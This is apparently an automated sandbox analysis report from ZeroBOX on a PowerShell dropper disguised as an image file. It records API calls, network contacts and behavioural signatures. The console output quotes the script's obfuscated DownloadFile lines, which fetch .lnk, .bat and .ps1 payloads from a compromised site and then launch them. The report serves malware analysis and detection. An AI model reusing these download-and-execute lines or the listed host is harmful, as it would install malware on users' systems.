Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 12, 2021, 5:54 p.m.	July 12, 2021, 5:56 p.m.

Size	1.8KB
Type	ASCII text, with CRLF line terminators
MD5	`526985f2ac9ccb243a78a8512a7c19e6`
SHA256	`1f369916268c53a12c34cee6b98075cd0bc071e435732bdf661b81791d0cdf79`
CRC32	`B258BDF8`
ssdeep	`48:tpK6Iuwto8nYb8o8IYbZq8/o3I0hIMroAldfFeJmFjbMbZVlFeJmFjbMbfCFeJm3:vos8nYbH8IYbg8Q40eMrLVBjbEVjBjbD`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\Y4maQsKxdyy0hVxk.jpg.ps1
2464

Name	Response	Post-Analysis Lookup
emegablog.com	A 97.74.236.9	97.74.236.9

IP Address	Status	Action
164.124.101.2	Active	Moloch
97.74.236.9	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW July 12, 2021, 5:54 p.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (34 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: Mode LastWriteTime Length Name console_handle: 0x0000001b	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: d---- 2021-07-12 오후 5:54 Start console_handle: 0x00000023	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti console_handle: 0x00000023	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x0000002f	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\Y4maQsKxdyy0hVxk.jpg.ps1:16 char:65 console_handle: 0x0000003b	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: + if((New-Object $SystemSettingsBroker)."`D`o`w`N`l`o`A`d`F`i`l`e" <<<< ('https console_handle: 0x00000047	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: ://emegablog.com/wp-content/themes/news247/images/qc5LcKjE9CmvXWOP.lnk', $cdg + console_handle: 0x00000053	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: 'XmugkFiNRqZwj51nell.lnk')){ console_handle: 0x0000005f	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x0000006b	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x00000077	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti console_handle: 0x00000097	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x000000a3	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\Y4maQsKxdyy0hVxk.jpg.ps1:19 char:65 console_handle: 0x000000af	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: + if((New-Object $SystemSettingsBroker)."`D`o`w`N`l`o`A`d`F`i`l`e" <<<< ('https console_handle: 0x000000bb	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: ://emegablog.com/wp-content/themes/news247/images/TXmxpbG0vP0jI5yD.jpg', $flori console_handle: 0x000000c7	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: da + 'pLGSOSwbttzem9rt.bat')){ console_handle: 0x000000d3	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000000df	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000000eb	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti console_handle: 0x0000010b	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x00000117	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\Y4maQsKxdyy0hVxk.jpg.ps1:22 char:65 console_handle: 0x00000123	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: + if((New-Object $SystemSettingsBroker)."`D`o`w`N`l`o`A`d`F`i`l`e" <<<< ('https console_handle: 0x0000012f	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: ://emegablog.com/wp-content/themes/news247/images/pktU9LoKSDqhtovq.jpg', $drogb console_handle: 0x0000013b	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: a + 'NKYGtat56ucXUWcGasyn.ps1')){ console_handle: 0x00000147	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x00000153	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x0000015f	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: Start-Process : This command cannot be executed due to the error: The system ca console_handle: 0x0000017f	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: nnot find the file specified. console_handle: 0x0000018b	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\Y4maQsKxdyy0hVxk.jpg.ps1:24 char:6 console_handle: 0x00000197	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: + start <<<< "C:\ProgramData\Microsoft Arts\Start\XmugkFiNRqZwj51nell.lnk" console_handle: 0x000001a3	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp console_handle: 0x000001af	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: erationException console_handle: 0x000001bb	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.C console_handle: 0x000001c7	1	1
WriteConsoleW July 12, 2021, 5:54 p.m.	buffer: ommands.StartProcessCommand console_handle: 0x000001d3	1	1

Uses Windows APIs to generate a cryptographic key (15 events)

Time & API	Arguments	Status	Return
CryptExportKey July 12, 2021, 5:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c38d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 12, 2021, 5:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c38d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 12, 2021, 5:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c3a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 12, 2021, 5:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c3a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 12, 2021, 5:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c3a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 12, 2021, 5:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c3a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 12, 2021, 5:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c3a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 12, 2021, 5:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c3a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 12, 2021, 5:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c3a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 12, 2021, 5:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c3a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 12, 2021, 5:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c3a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 12, 2021, 5:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c3a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 12, 2021, 5:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c3a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 12, 2021, 5:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c3a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 12, 2021, 5:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c3a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 12, 2021, 5:54 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (40 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0274f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f89000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05441000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05600000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02749000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a33000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05601000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 1572864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x066b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x067f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x067f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x067f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x067f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x067f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x067f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x067f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x067fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0680b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0680c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0680d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055f7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f8d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055f8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05456000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05457000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05458000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 12, 2021, 5:54 p.m.	process_identifier: 2464 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055f9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\ProgramData\Microsoft Arts\Start\XmugkFiNRqZwj51nell.lnk

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 12, 2021, 5:54 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (2 events)

Data received
Data received	F

Poweshell is sending data to a remote host (6 events)

Data sent	pl`ìYÚê3¿UÝ=8k$£ï*Üry¸xÍFN/5 ÀÀÀ À 28+ÿ emegablog.com
Data sent	pl`ìZ@*yÆêÿÂ\i·A¨YÏF8þ\|çðUi³/5 ÀÀÀ À 28+ÿ emegablog.com
Data sent	pl`ìZ+*ëhõ´Óêýúê¾ûp6aÝDãi'Í/5 ÀÀÀ À 28+ÿ emegablog.com
Data sent	pl`ìZd±iÈÓ\É\¯¼\W¯á\|ëlÇ8/5 ÀÀÀ À 28+ÿ emegablog.com
Data sent	pl`ì[IëÕóª üqtiÅÎAÛV¢UR·½9îÝ /5 ÀÀÀ À 28+ÿ emegablog.com
Data sent	pl`ì[çoÆßà4ï'-ÑÍ]»óÖ 7i/5 ÀÀÀ À 28+ÿ emegablog.com

Deletes executed files from disk (1 event)

file	C:\ProgramData\Microsoft Arts\Start\XmugkFiNRqZwj51nell.lnk

Drops a binary and executes it (1 event)

file	C:\ProgramData\Microsoft Arts\Start\XmugkFiNRqZwj51nell.lnk

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (6 events)

Time & API	Arguments	Status	Return
send July 12, 2021, 5:54 p.m.	buffer: pl`ìYÚê3¿UÝ=8k$£ï*Üry¸xÍFN/5 ÀÀÀ À 28+ÿ emegablog.com socket: 1524 sent: 117	1	117
send July 12, 2021, 5:54 p.m.	buffer: pl`ìZ@*yÆêÿÂ\i·A¨YÏF8þ\|çðUi³/5 ÀÀÀ À 28+ÿ emegablog.com socket: 1524 sent: 117	1	117
send July 12, 2021, 5:54 p.m.	buffer: pl`ìZ+*ëhõ´Óêýúê¾ûp6aÝDãi'Í/5 ÀÀÀ À 28+ÿ emegablog.com socket: 1560 sent: 117	1	117
send July 12, 2021, 5:54 p.m.	buffer: pl`ìZd±iÈÓ\É\¯¼\W¯á\|ëlÇ8/5 ÀÀÀ À 28+ÿ emegablog.com socket: 1560 sent: 117	1	117
send July 12, 2021, 5:54 p.m.	buffer: pl`ì[IëÕóª üqtiÅÎAÛV¢UR·½9îÝ /5 ÀÀÀ À 28+ÿ emegablog.com socket: 1560 sent: 117	1	117
send July 12, 2021, 5:54 p.m.	buffer: pl`ì[çoÆßà4ï'-ÑÍ]»óÖ 7i/5 ÀÀÀ À 28+ÿ emegablog.com socket: 1560 sent: 117	1	117

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

C:\ProgramData\Microsoft Arts\Start\XmugkFiNRqZwj51nell.lnk

Y4maQsKxdyy0hVxk.jpg.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All